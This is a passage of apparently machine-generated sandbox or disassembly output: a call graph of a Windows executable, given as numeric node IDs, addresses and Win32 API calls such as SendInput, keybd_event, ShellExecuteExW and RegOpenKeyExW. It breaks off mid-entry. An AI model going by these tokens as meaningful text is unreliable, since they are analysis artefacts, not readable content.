e1940 9 API calls 96890->96893 96895 126346 96891->96895 96897 e182c 96891->96897 96894 e13b6 96893->96894 96894->96891 96896 e13ec 96894->96896 97031 14359c 82 API calls __wsopen_s 96895->97031 96896->96895 96920 e1408 __fread_nolock 96896->96920 96899 daceb 23 API calls 96897->96899 96901 e1839 96899->96901 96900 e17d4 97027 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96900->97027 97028 ed217 257 API calls 96901->97028 96904 12636e 97032 14359c 82 API calls __wsopen_s 96904->97032 96905 e152f 96907 e153c 96905->96907 96908 1263d1 96905->96908 96910 e1940 9 API calls 96907->96910 97034 155745 54 API calls _wcslen 96908->97034 96911 e1549 96910->96911 96917 e1940 9 API calls 96911->96917 96922 e15c7 messages 96911->96922 96912 efddb 22 API calls 96912->96920 96913 e1872 96913->96884 97029 efaeb 23 API calls 96913->97029 96914 efe0b 22 API calls 96914->96920 96915 e171d 96915->96858 96926 e1563 96917->96926 96919 dec40 257 API calls 96919->96920 96920->96901 96920->96904 96920->96905 96920->96912 96920->96914 96920->96919 96920->96922 96924 1263b2 96920->96924 96921 e167b messages 96921->96915 97019 ece17 22 API calls messages 96921->97019 96922->96913 96922->96921 96923 e1940 9 API calls 96922->96923 96989 1629bf 96922->96989 96993 1619bc 96922->96993 96996 150d9c 96922->96996 97009 15ac5b 96922->97009 97012 ef645 96922->97012 97036 14359c 82 API calls __wsopen_s 96922->97036 96923->96922 97033 14359c 82 API calls __wsopen_s 96924->97033 96926->96922 97035 da8c7 22 API calls __fread_nolock 96926->97035 96935 eee09 96934->96935 96936 eee12 96934->96936 96935->96858 96936->96935 96937 eee36 IsDialogMessageW 96936->96937 96938 12efaf GetClassLongW 96936->96938 96937->96935 96937->96936 96938->96936 96938->96937 96939->96858 96940->96858 96941->96858 96942->96858 96943->96858 96944->96858 96945->96864 96946->96864 96947->96864 96948->96864 96950 dec40 257 API calls 96949->96950 96970 dd29d 96950->96970 96951 121bc4 96988 14359c 82 API calls __wsopen_s 96951->96988 96953 dd3c3 96955 dd6d5 96953->96955 96957 dd3ce 96953->96957 96954 dd30b messages 96954->96878 96955->96954 96965 efe0b 22 API calls 96955->96965 96956 dd5ff 96958 121bb5 96956->96958 96959 dd614 96956->96959 96961 efddb 22 API calls 96957->96961 96987 155705 23 API calls 96958->96987 96963 efddb 22 API calls 96959->96963 96960 dd4b8 96966 efe0b 22 API calls 96960->96966 96967 dd3d5 __fread_nolock 96961->96967 96973 dd46a 96963->96973 96964 efddb 22 API calls 96964->96970 96965->96967 96976 dd429 __fread_nolock messages 96966->96976 96968 efddb 22 API calls 96967->96968 96969 dd3f6 96967->96969 96968->96969 96969->96976 96982 dbec0 257 API calls 96969->96982 96970->96951 96970->96953 96970->96954 96970->96955 96970->96960 96970->96964 96970->96976 96972 121ba4 96986 14359c 82 API calls __wsopen_s 96972->96986 96973->96878 96976->96956 96976->96972 96976->96973 96977 121b7f 96976->96977 96979 121b5d 96976->96979 96983 d1f6f 257 API calls 96976->96983 96985 14359c 82 API calls __wsopen_s 96977->96985 96984 14359c 82 API calls __wsopen_s 96979->96984 96981->96880 96982->96976 96983->96976 96984->96973 96985->96973 96986->96973 96987->96951 96988->96954 96990 1629cb 96989->96990 96991 162a01 GetForegroundWindow 96990->96991 96992 1629d1 96990->96992 96991->96992 96992->96922 97037 162ad8 96993->97037 96995 1619cb 96995->96922 96997 150db6 96996->96997 96998 150ddc 96996->96998 97098 db567 96997->97098 97001 d7510 53 API calls 96998->97001 97000 150dbe 97000->96998 97002 150dc9 97000->97002 97003 150de5 97001->97003 97004 d7510 53 API calls 97002->97004 97075 13a1c5 97003->97075 97006 150dce 97004->97006 97103 13a396 87 API calls 97006->97103 97007 150dda 97007->96922 97347 15ad64 97009->97347 97011 15ac6f 97011->96922 97013 db567 39 API calls 97012->97013 97014 ef659 97013->97014 97015 12f2dc Sleep 97014->97015 97016 ef661 timeGetTime 97014->97016 97017 db567 39 API calls 97016->97017 97018 ef677 97017->97018 97018->96922 97019->96921 97020->96888 97022 d9cc2 _wcslen 97021->97022 97023 efe0b 22 API calls 97022->97023 97024 d9cea __fread_nolock 97023->97024 97025 efddb 22 API calls 97024->97025 97026 d9d00 97025->97026 97026->96900 97027->96891 97028->96913 97029->96913 97030->96889 97031->96922 97032->96922 97033->96922 97034->96926 97035->96922 97036->96922 97038 daceb 23 API calls 97037->97038 97039 162af3 97038->97039 97040 162aff 97039->97040 97041 162b1d 97039->97041 97047 d7510 97040->97047 97043 d6b57 22 API calls 97041->97043 97046 162b1b 97043->97046 97046->96995 97048 d7525 97047->97048 97064 d7522 97047->97064 97049 d752d 97048->97049 97050 d755b 97048->97050 97071 f51c6 26 API calls 97049->97071 97053 d756d 97050->97053 97054 11500f 97050->97054 97060 1150f6 97050->97060 97072 efb21 51 API calls 97053->97072 97063 efe0b 22 API calls 97054->97063 97065 115088 97054->97065 97055 11510e 97055->97055 97058 efddb 22 API calls 97061 d7547 97058->97061 97059 d753d 97059->97058 97074 f5183 26 API calls 97060->97074 97062 d9cb3 22 API calls 97061->97062 97062->97064 97066 115058 97063->97066 97064->97046 97070 da8c7 22 API calls __fread_nolock 97064->97070 97073 efb21 51 API calls 97065->97073 97067 efddb 22 API calls 97066->97067 97068 11507f 97067->97068 97069 d9cb3 22 API calls 97068->97069 97069->97065 97070->97046 97071->97059 97072->97059 97073->97060 97074->97055 97104 13b12f 97075->97104 97078 13a1f6 97257 13a9ed 23 API calls 97078->97257 97079 13a21a 97118 d6270 97079->97118 97082 13a200 97258 139c79 11 API calls 97082->97258 97084 13a210 97084->97079 97085 13a2e7 97087 13a306 97085->97087 97088 13a2ed 97085->97088 97086 13a227 97086->97085 97123 139f3f 97086->97123 97131 ee2a2 97086->97131 97136 13a442 97086->97136 97259 13a324 57 API calls 97086->97259 97091 13b12f 10 API calls 97087->97091 97260 13acda 23 API calls 97088->97260 97093 13a312 97091->97093 97092 13a2f9 97261 13a9ed 23 API calls 97092->97261 97093->97007 97099 db578 97098->97099 97100 db57f 97098->97100 97099->97100 97346 f62d1 39 API calls _strftime 97099->97346 97100->97000 97102 db5c2 97102->97000 97103->97007 97105 13b148 GetCurrentThreadId 97104->97105 97106 13b13e 97104->97106 97108 13b163 GetForegroundWindow GetWindowThreadProcessId AttachThreadInput 97105->97108 97109 13b1ea 97105->97109 97106->97105 97107 13a1e1 97106->97107 97107->97078 97107->97079 97112 13b1c0 97108->97112 97113 13b188 GetWindowThreadProcessId 97108->97113 97110 13b214 97109->97110 97111 13b1f4 AttachThreadInput 97109->97111 97114 13b219 AttachThreadInput 97110->97114 97111->97114 97115 13b20e AttachThreadInput 97111->97115 97112->97107 97116 13b1a2 AttachThreadInput 97113->97116 97117 13b1b4 AttachThreadInput 97113->97117 97114->97107 97115->97110 97116->97117 97117->97112 97119 efe0b 22 API calls 97118->97119 97120 d6295 97119->97120 97121 efddb 22 API calls 97120->97121 97122 d62a3 97121->97122 97122->97086 97124 139f48 97123->97124 97125 139f78 97123->97125 97124->97125 97126 139f50 IsWindow 97124->97126 97125->97086 97126->97125 97127 139f5d GetForegroundWindow 97126->97127 97127->97125 97128 139f68 97127->97128 97128->97127 97130 139f76 97128->97130 97262 13b0a8 14 API calls 97128->97262 97130->97125 97132 da6c3 22 API calls 97131->97132 97134 ee2b7 97132->97134 97133 ee2f2 97133->97086 97134->97133 97263 d49bd 22 API calls __fread_nolock 97134->97263 97137 13a468 97136->97137 97138 da961 22 API calls 97137->97138 97139 13a476 97138->97139 97140 da961 22 API calls 97139->97140 97141 13a47e 97140->97141 97142 ee2a2 22 API calls 97141->97142 97146 13a493 97142->97146 97144 13a4ef 97145 13a5fb 97144->97145 97264 f4a28 97144->97264 97147 13a640 97145->97147 97148 13a606 97145->97148 97146->97144 97170 ee2a2 22 API calls 97146->97170 97149 13a652 97147->97149 97150 13a69e 97147->97150 97151 d4c6d 22 API calls 97148->97151 97294 13b2df MapVirtualKeyW 97149->97294 97154 13a833 97150->97154 97155 13a6f2 97150->97155 97156 13a752 97150->97156 97157 13a6b1 97150->97157 97158 13a850 97150->97158 97159 13a816 97150->97159 97160 13a714 97150->97160 97161 13a7f9 97150->97161 97162 13a73c 97150->97162 97163 13a7e3 97150->97163 97164 13a7c6 97150->97164 97165 13a8a4 97150->97165 97166 13a88a 97150->97166 97167 13a78a 97150->97167 97168 13a86d 97150->97168 97218 13a68d 97150->97218 97153 13a610 97151->97153 97293 13b27a VkKeyScanW MapVirtualKeyW 97153->97293 97179 13a83d 97154->97179 97154->97218 97299 13b2df MapVirtualKeyW 97155->97299 97303 13b2df MapVirtualKeyW 97156->97303 97297 13b2df MapVirtualKeyW 97157->97297 97158->97218 97310 13b2df MapVirtualKeyW 97158->97310 97159->97218 97308 13b2df MapVirtualKeyW 97159->97308 97175 13a71e 97160->97175 97160->97218 97177 13a803 97161->97177 97161->97218 97162->97218 97302 13b2df MapVirtualKeyW 97162->97302 97163->97218 97306 13b2df MapVirtualKeyW 97163->97306 97173 13a7d0 97164->97173 97164->97218 97174 13a8b7 97165->97174 97188 13a636 97165->97188 97166->97218 97312 13b2df MapVirtualKeyW 97166->97312 97304 13b2df MapVirtualKeyW 97167->97304 97183 13a877 97168->97183 97168->97218 97169 13a65b 97176 13a663 97169->97176 97216 13a6c9 97169->97216 97178 13a4d8 97170->97178 97305 13b2df MapVirtualKeyW 97173->97305 97189 13a8bc 97174->97189 97224 13a8d1 97174->97224 97300 13b2df MapVirtualKeyW 97175->97300 97192 13a6cf 97176->97192 97193 13a66b 97176->97193 97307 13b2df MapVirtualKeyW 97177->97307 97196 f4a28 _strftime 40 API calls 97178->97196 97309 13b2df MapVirtualKeyW 97179->97309 97311 13b2df MapVirtualKeyW 97183->97311 97184 13a61c 97185 13a624 97184->97185 97184->97216 97185->97192 97206 13a62c 97185->97206 97186 13a6fc 97207 13a6cb 97186->97207 97186->97216 97313 13a324 57 API calls 97188->97313 97314 13b2df MapVirtualKeyW 97189->97314 97192->97218 97274 13ab9c 97192->97274 97210 13a67b 97193->97210 97215 13a692 97193->97215 97212 13a4e5 97196->97212 97200 13a75f 97200->97207 97213 13a6bf 97200->97213 97201 13a6bb 97201->97207 97201->97213 97203 13a797 97203->97207 97203->97213 97214 d4c6d 22 API calls 97206->97214 97207->97192 97217 13a6e2 97207->97217 97295 13a9ed 23 API calls 97210->97295 97211 13a737 97211->97218 97212->97144 97225 f4a28 _strftime 40 API calls 97212->97225 97213->97216 97213->97218 97214->97188 97296 13a982 55 API calls 97215->97296 97301 13aa57 20 API calls 97216->97301 97298 13aa57 20 API calls 97217->97298 97218->97086 97219 13a8c6 97315 13aa57 20 API calls 97219->97315 97220 d4c6d 22 API calls 97220->97224 97224->97220 97229 13a913 97224->97229 97236 13a8e1 97224->97236 97227 13a503 97225->97227 97227->97144 97232 f4a28 _strftime 40 API calls 97227->97232 97229->97218 97318 13b2df MapVirtualKeyW 97229->97318 97230 13a6ed 97230->97192 97231 d4c6d 22 API calls 97231->97236 97235 13a51d 97232->97235 97235->97144 97238 f4a28 _strftime 40 API calls 97235->97238 97236->97224 97236->97231 97240 13ab9c 20 API calls 97236->97240 97316 13b2df MapVirtualKeyW 97236->97316 97317 13aa57 20 API calls 97236->97317 97239 13a539 97238->97239 97239->97144 97288 d4c6d 97239->97288 97240->97236 97243 13a5cc 97292 f62d1 39 API calls _strftime 97243->97292 97245 d4c6d 22 API calls 97246 13a565 97245->97246 97247 13a57b 97246->97247 97248 d4c6d 22 API calls 97246->97248 97249 d93b2 22 API calls 97247->97249 97250 13a575 97248->97250 97251 13a586 97249->97251 97250->97243 97250->97247 97252 d4c6d 22 API calls 97251->97252 97253 13a59a 97252->97253 97291 13b30d 51 API calls 97253->97291 97255 13a5bb 97256 d6b57 22 API calls 97255->97256 97256->97144 97257->97082 97258->97084 97259->97086 97260->97092 97261->97087 97262->97128 97263->97134 97265 f4aab 97264->97265 97266 f4a36 97264->97266 97321 f4abd 40 API calls 4 library calls 97265->97321 97269 f4a5b 97266->97269 97319 ff2d9 20 API calls _abort 97266->97319 97268 f4ab8 97268->97144 97269->97144 97271 f4a42 97320 1027ec 26 API calls _abort 97271->97320 97273 f4a4d 97273->97144 97275 13ac7c 97274->97275 97278 13abc6 97274->97278 97276 13aca2 SendInput 97275->97276 97281 13ac81 97275->97281 97277 13aca0 97276->97277 97326 139c49 97277->97326 97278->97275 97280 13abe1 97278->97280 97280->97277 97283 13abea GetKeyboardState 97280->97283 97322 13b226 97281->97322 97284 13abfb SetKeyboardState 97283->97284 97286 13ac13 97283->97286 97284->97286 97287 13ac71 PostMessageW 97286->97287 97287->97277 97289 daec9 22 API calls 97288->97289 97290 d4c78 97289->97290 97290->97243 97290->97245 97291->97255 97292->97144 97293->97184 97294->97169 97295->97218 97296->97218 97297->97201 97298->97230 97299->97186 97300->97216 97301->97211 97302->97192 97303->97200 97304->97203 97305->97216 97306->97192 97307->97216 97308->97192 97309->97216 97310->97192 97311->97216 97312->97192 97313->97218 97314->97219 97315->97224 97316->97236 97317->97236 97318->97192 97319->97271 97320->97273 97321->97268 97323 13b232 SendInput 97322->97323 97324 13b265 keybd_event 97322->97324 97325 13b276 97323->97325 97324->97325 97325->97277 97328 139c57 97326->97328 97327 13b0b7 Sleep 97334 13acd3 97327->97334 97328->97327 97330 13b0c0 QueryPerformanceCounter 97328->97330 97328->97334 97330->97327 97333 13b0ce 97330->97333 97331 13b0e7 Sleep QueryPerformanceCounter 97335 ee398 97331->97335 97333->97331 97333->97334 97334->97218 97336 ee3ad 97335->97336 97337 ee3b4 97335->97337 97336->97333 97343 f0242 5 API calls __Init_thread_wait 97337->97343 97339 ee3c0 97339->97336 97344 ee3de QueryPerformanceFrequency 97339->97344 97341 ee3d4 97345 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97341->97345 97343->97339 97344->97341 97345->97336 97346->97102 97348 da961 22 API calls 97347->97348 97350 15ad77 ___scrt_fastfail 97348->97350 97349 15adce 97351 15adee 97349->97351 97353 d7510 53 API calls 97349->97353 97350->97349 97352 d7510 53 API calls 97350->97352 97354 15ae3a 97351->97354 97357 d7510 53 API calls 97351->97357 97355 15adab 97352->97355 97356 15ade4 97353->97356 97360 15ae4d ___scrt_fastfail 97354->97360 97362 db567 39 API calls 97354->97362 97355->97349 97358 d7510 53 API calls 97355->97358 97376 d7620 22 API calls _wcslen 97356->97376 97365 15ae04 97357->97365 97361 15adc4 97358->97361 97364 d7510 53 API calls 97360->97364 97375 d7620 22 API calls _wcslen 97361->97375 97362->97360 97366 15ae85 ShellExecuteExW 97364->97366 97365->97354 97367 d7510 53 API calls 97365->97367 97371 15aeb0 97366->97371 97368 15ae28 97367->97368 97368->97354 97377 da8c7 22 API calls __fread_nolock 97368->97377 97370 15aec8 97370->97011 97371->97370 97372 15af35 GetProcessId 97371->97372 97373 15af48 97372->97373 97374 15af58 CloseHandle 97373->97374 97374->97370 97375->97349 97376->97351 97377->97354 97378 df7bf 97379 dfcb6 97378->97379 97380 df7d3 97378->97380 97381 daceb 23 API calls 97379->97381 97382 dfcc2 97380->97382 97383 efddb 22 API calls 97380->97383 97381->97382 97384 daceb 23 API calls 97382->97384 97385 df7e5 97383->97385 97387 dfd3d 97384->97387 97385->97382 97386 df83e 97385->97386 97385->97387 97389 e1310 257 API calls 97386->97389 97411 ded9d messages 97386->97411 97415 141155 22 API calls 97387->97415 97410 dec76 messages 97389->97410 97391 dfef7 97391->97411 97417 da8c7 22 API calls __fread_nolock 97391->97417 97393 efddb 22 API calls 97393->97410 97394 124600 97394->97411 97416 da8c7 22 API calls __fread_nolock 97394->97416 97395 124b0b 97419 14359c 82 API calls __wsopen_s 97395->97419 97399 da8c7 22 API calls 97399->97410 97402 f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97402->97410 97403 dfbe3 97405 124bdc 97403->97405 97403->97411 97412 df3ae messages 97403->97412 97404 da961 22 API calls 97404->97410 97420 14359c 82 API calls __wsopen_s 97405->97420 97407 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97407->97410 97408 124beb 97421 14359c 82 API calls __wsopen_s 97408->97421 97409 f00a3 29 API calls pre_c_initialization 97409->97410 97410->97391 97410->97393 97410->97394 97410->97395 97410->97399 97410->97402 97410->97403 97410->97404 97410->97407 97410->97408 97410->97409 97410->97411 97410->97412 97413 e01e0 257 API calls 2 library calls 97410->97413 97414 e06a0 41 API calls messages 97410->97414 97412->97411 97418 14359c 82 API calls __wsopen_s 97412->97418 97413->97410 97414->97410 97415->97411 97416->97411 97417->97411 97418->97411 97419->97411 97420->97408 97421->97411 97422 112402 97425 d1410 97422->97425 97426 d144f mciSendStringW 97425->97426 97427 1124b8 DestroyWindow 97425->97427 97428 d146b 97426->97428 97429 d16c6 97426->97429 97440 1124c4 97427->97440 97430 d1479 97428->97430 97428->97440 97429->97428 97431 d16d5 UnregisterHotKey 97429->97431 97458 d182e 97430->97458 97431->97429 97434 112509 97439 11252d 97434->97439 97441 11251c FreeLibrary 97434->97441 97435 1124e2 FindClose 97435->97440 97436 1124d8 97436->97440 97464 d6246 CloseHandle 97436->97464 97438 d148e 97438->97439 97445 d149c 97438->97445 97442 112541 VirtualFree 97439->97442 97447 d1509 97439->97447 97440->97434 97440->97435 97440->97436 97441->97434 97442->97439 97443 d14f8 OleUninitialize 97443->97447 97444 112589 97450 112598 messages 97444->97450 97465 1432eb 6 API calls messages 97444->97465 97445->97443 97447->97444 97448 d1514 97447->97448 97462 d1944 VirtualFreeEx CloseHandle 97448->97462 97454 112627 97450->97454 97466 1364d4 22 API calls messages 97450->97466 97452 d153a 97452->97450 97453 d161f 97452->97453 97453->97454 97455 d166d 97453->97455 97454->97454 97455->97454 97463 d1876 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 97455->97463 97457 d16c1 97459 d183b 97458->97459 97460 d1480 97459->97460 97467 13702a 22 API calls 97459->97467 97460->97434 97460->97438 97462->97452 97463->97457 97464->97436 97465->97444 97466->97450 97467->97459 97468 112ba5 97469 d2b25 97468->97469 97470 112baf 97468->97470 97496 d2b83 7 API calls 97469->97496 97514 d3a5a 97470->97514 97474 112bb8 97476 d9cb3 22 API calls 97474->97476 97478 112bc6 97476->97478 97477 d2b2f 97479 d2b44 97477->97479 97500 d3837 97477->97500 97480 112bf5 97478->97480 97481 112bce 97478->97481 97487 d2b5f 97479->97487 97510 d30f2 97479->97510 97482 d33c6 22 API calls 97480->97482 97521 d33c6 97481->97521 97495 112bf1 GetForegroundWindow ShellExecuteW 97482->97495 97492 d2b66 SetCurrentDirectoryW 97487->97492 97489 112be7 97493 d33c6 22 API calls 97489->97493 97490 112c26 97490->97487 97494 d2b7a 97492->97494 97493->97495 97495->97490 97531 d2cd4 7 API calls 97496->97531 97498 d2b2a 97499 d2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97498->97499 97499->97477 97501 d3862 ___scrt_fastfail 97500->97501 97532 d4212 97501->97532 97505 113386 Shell_NotifyIconW 97506 d3906 Shell_NotifyIconW 97536 d3923 97506->97536 97507 d38e8 97507->97505 97507->97506 97509 d391c 97509->97479 97511 d3154 97510->97511 97512 d3104 ___scrt_fastfail 97510->97512 97511->97487 97513 d3123 Shell_NotifyIconW 97512->97513 97513->97511 97515 111f50 __wsopen_s 97514->97515 97516 d3a67 GetModuleFileNameW 97515->97516 97517 d9cb3 22 API calls 97516->97517 97518 d3a8d 97517->97518 97519 d3aa2 23 API calls 97518->97519 97520 d3a97 97519->97520 97520->97474 97522 d33dd 97521->97522 97523 1130bb 97521->97523 97562 d33ee 97522->97562 97524 efddb 22 API calls 97523->97524 97527 1130c5 _wcslen 97524->97527 97526 d33e8 97530 d6350 22 API calls 97526->97530 97528 efe0b 22 API calls 97527->97528 97529 1130fe __fread_nolock 97528->97529 97530->97489 97531->97498 97533 1135a4 97532->97533 97534 d38b7 97532->97534 97533->97534 97535 1135ad DestroyIcon 97533->97535 97534->97507 97558 13c874 42 API calls _strftime 97534->97558 97535->97534 97537 d393f 97536->97537 97556 d3a13 97536->97556 97538 d6270 22 API calls 97537->97538 97539 d394d 97538->97539 97540 113393 LoadStringW 97539->97540 97541 d395a 97539->97541 97543 1133ad 97540->97543 97542 d6b57 22 API calls 97541->97542 97544 d396f 97542->97544 97552 d3994 ___scrt_fastfail 97543->97552 97560 da8c7 22 API calls __fread_nolock 97543->97560 97545 d397c 97544->97545 97546 1133c9 97544->97546 97545->97543 97548 d3986 97545->97548 97561 d6350 22 API calls 97546->97561 97559 d6350 22 API calls 97548->97559 97551 1133d7 97551->97552 97553 d33c6 22 API calls 97551->97553 97554 d39f9 Shell_NotifyIconW 97552->97554 97555 1133f9 97553->97555 97554->97556 97557 d33c6 22 API calls 97555->97557 97556->97509 97557->97552 97558->97507 97559->97552 97560->97552 97561->97551 97563 d33fe _wcslen 97562->97563 97564 11311d 97563->97564 97565 d3411 97563->97565 97567 efddb 22 API calls 97564->97567 97572 da587 97565->97572 97569 113127 97567->97569 97568 d341e __fread_nolock 97568->97526 97570 efe0b 22 API calls 97569->97570 97571 113157 __fread_nolock 97570->97571 97573 da59d 97572->97573 97576 da598 __fread_nolock 97572->97576 97574 11f80f 97573->97574 97575 efe0b 22 API calls 97573->97575 97575->97576 97576->97568 97577 f03fb 97578 f0407 ___BuildCatchObject 97577->97578 97606 efeb1 97578->97606 97580 f040e 97581 f0561 97580->97581 97584 f0438 97580->97584 97636 f083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97581->97636 97583 f0568 97629 f4e52 97583->97629 97595 f0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97584->97595 97617 10247d 97584->97617 97591 f0457 97594 f04de 97598 f04f3 97594->97598 97597 f04d8 97595->97597 97632 f4e1a 38 API calls 3 library calls 97595->97632 97625 f0959 97597->97625 97633 f0992 GetModuleHandleW 97598->97633 97600 f04fa 97600->97583 97601 f04fe 97600->97601 97602 f0507 97601->97602 97634 f4df5 28 API calls _abort 97601->97634 97635 f0040 13 API calls 2 library calls 97602->97635 97605 f050f 97605->97591 97607 efeba 97606->97607 97638 f0698 IsProcessorFeaturePresent 97607->97638 97609 efec6 97639 f2c94 10 API calls 3 library calls 97609->97639 97611 efecb 97612 efecf 97611->97612 97640 102317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97611->97640 97612->97580 97614 efed8 97615 efee6 97614->97615 97641 f2cbd 8 API calls 3 library calls 97614->97641 97615->97580 97618 102494 97617->97618 97642 f0a8c 97618->97642 97620 f0451 97620->97591 97621 102421 97620->97621 97624 102450 97621->97624 97622 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97623 102479 97622->97623 97623->97595 97624->97622 97650 f2340 97625->97650 97628 f097f 97628->97594 97652 f4bcf 97629->97652 97632->97597 97633->97600 97634->97602 97635->97605 97636->97583 97638->97609 97639->97611 97640->97614 97641->97612 97643 f0a97 IsProcessorFeaturePresent 97642->97643 97644 f0a95 97642->97644 97646 f0c5d 97643->97646 97644->97620 97649 f0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97646->97649 97648 f0d40 97648->97620 97649->97648 97651 f096c GetStartupInfoW 97650->97651 97651->97628 97653 f4bdb IsInExceptionSpec 97652->97653 97654 f4bf4 97653->97654 97655 f4be2 97653->97655 97676 102f5e EnterCriticalSection 97654->97676 97691 f4d29 GetModuleHandleW 97655->97691 97658 f4be7 97658->97654 97692 f4d6d GetModuleHandleExW 97658->97692 97662 f4bfb 97672 f4c70 97662->97672 97675 f4c99 97662->97675 97677 1021a8 97662->97677 97664 f4cb6 97683 f4ce8 97664->97683 97665 f4ce2 97700 111d29 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 97665->97700 97668 102421 _abort 5 API calls 97674 f4c88 97668->97674 97669 102421 _abort 5 API calls 97669->97675 97672->97668 97672->97674 97674->97669 97680 f4cd9 97675->97680 97676->97662 97701 101ee1 97677->97701 97720 102fa6 LeaveCriticalSection 97680->97720 97682 f4cb2 97682->97664 97682->97665 97721 10360c 97683->97721 97686 f4d16 97688 f4d6d _abort 8 API calls 97686->97688 97687 f4cf6 GetPEB 97687->97686 97689 f4d06 GetCurrentProcess TerminateProcess 97687->97689 97690 f4d1e ExitProcess 97688->97690 97689->97686 97691->97658 97693 f4dba 97692->97693 97694 f4d97 GetProcAddress 97692->97694 97696 f4dc9 97693->97696 97697 f4dc0 FreeLibrary 97693->97697 97695 f4dac 97694->97695 97695->97693 97698 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97696->97698 97697->97696 97699 f4bf3 97698->97699 97699->97654 97704 101e90 97701->97704 97703 101f05 97703->97672 97705 101e9c ___BuildCatchObject 97704->97705 97712 102f5e EnterCriticalSection 97705->97712 97707 101eaa 97713 101f31 97707->97713 97711 101ec8 __wsopen_s 97711->97703 97712->97707 97716 101f51 97713->97716 97717 101f59 97713->97717 97714 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97715 101eb7 97714->97715 97719 101ed5 LeaveCriticalSection _abort 97715->97719 97716->97714 97717->97716 97718 1029c8 _free 20 API calls 97717->97718 97718->97716 97719->97711 97720->97682 97722 103631 97721->97722 97723 103627 97721->97723 97728 102fd7 5 API calls 2 library calls 97722->97728 97725 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97723->97725 97726 f4cf2 97725->97726 97726->97686 97726->97687 97727 103648 97727->97723 97728->97727 97729 d1098 97734 d42de 97729->97734 97733 d10a7 97735 da961 22 API calls 97734->97735 97736 d42f5 GetVersionExW 97735->97736 97737 d6b57 22 API calls 97736->97737 97738 d4342 97737->97738 97739 d93b2 22 API calls 97738->97739 97751 d4378 97738->97751 97740 d436c 97739->97740 97742 d37a0 22 API calls 97740->97742 97741 d441b GetCurrentProcess IsWow64Process 97743 d4437 97741->97743 97742->97751 97744 d444f LoadLibraryA 97743->97744 97745 113824 GetSystemInfo 97743->97745 97746 d449c GetSystemInfo 97744->97746 97747 d4460 GetProcAddress 97744->97747 97749 d4476 97746->97749 97747->97746 97748 d4470 GetNativeSystemInfo 97747->97748 97748->97749 97752 d447a FreeLibrary 97749->97752 97753 d109d 97749->97753 97750 1137df 97751->97741 97751->97750 97752->97753 97754 f00a3 29 API calls __onexit 97753->97754 97754->97733 97755 d105b 97760 d344d 97755->97760 97757 d106a 97791 f00a3 29 API calls __onexit 97757->97791 97759 d1074 97761 d345d __wsopen_s 97760->97761 97762 da961 22 API calls 97761->97762 97763 d3513 97762->97763 97764 d3a5a 24 API calls 97763->97764 97765 d351c 97764->97765 97792 d3357 97765->97792 97768 d33c6 22 API calls 97769 d3535 97768->97769 97770 d515f 22 API calls 97769->97770 97771 d3544 97770->97771 97772 da961 22 API calls 97771->97772 97773 d354d 97772->97773 97774 da6c3 22 API calls 97773->97774 97775 d3556 RegOpenKeyExW 97774->97775 97776 113176 RegQueryValueExW 97775->97776 97780 d3578 97775->97780 97777 113193 97776->97777 97778 11320c RegCloseKey 97776->97778 97779 efe0b 22 API calls 97777->97779 97778->97780 97787 11321e _wcslen 97778->97787 97781 1131ac 97779->97781 97780->97757 97783 d5722 22 API calls 97781->97783 97782 d4c6d 22 API calls 97782->97787 97784 1131b7 RegQueryValueExW 97783->97784 97785 1131d4 97784->97785 97788 1131ee messages 97784->97788 97786 d6b57 22 API calls 97785->97786 97786->97788 97787->97780 97787->97782 97789 d9cb3 22 API calls 97787->97789 97790 d515f 22 API calls 97787->97790 97788->97778 97789->97787 97790->97787 97791->97759 97793 111f50 __wsopen_s 97792->97793 97794 d3364 GetFullPathNameW 97793->97794 97795 d3386 97794->97795 97796 d6b57 22 API calls 97795->97796 97797 d33a4 97796->97797 97797->97768 97798 ef698 97799 ef6a2 97798->97799 97800 ef6c3 97798->97800 97807 daf8a 97799->97807 97805 12f2f8 97800->97805 97815 134d4a 22 API calls messages 97800->97815 97803 ef6b2 97804 daf8a 22 API calls 97803->97804 97806 ef6c2 97804->97806 97808 daf98 97807->97808 97809 dafc0 messages 97807->97809 97810 dafa6 97808->97810 97811 daf8a 22 API calls 97808->97811 97809->97803 97812 dafac 97810->97812 97813 daf8a 22 API calls 97810->97813 97811->97810 97812->97809 97816 db090 97812->97816 97813->97812 97815->97800 97817 db09b messages 97816->97817 97819 db0d6 messages 97817->97819 97820 ece17 22 API calls messages 97817->97820 97819->97809 97820->97819 97821 d2e37 97822 da961 22 API calls 97821->97822 97823 d2e4d 97822->97823 97900 d4ae3 97823->97900 97825 d2e6b 97826 d3a5a 24 API calls 97825->97826 97827 d2e7f 97826->97827 97828 d9cb3 22 API calls 97827->97828 97829 d2e8c 97828->97829 97830 d4ecb 94 API calls 97829->97830 97831 d2ea5 97830->97831 97832 d2ead 97831->97832 97833 112cb0 97831->97833 97914 da8c7 22 API calls __fread_nolock 97832->97914 97834 142cf9 80 API calls 97833->97834 97835 112cc3 97834->97835 97837 112ccf 97835->97837 97839 d4f39 68 API calls 97835->97839 97841 d4f39 68 API calls 97837->97841 97838 d2ec3 97915 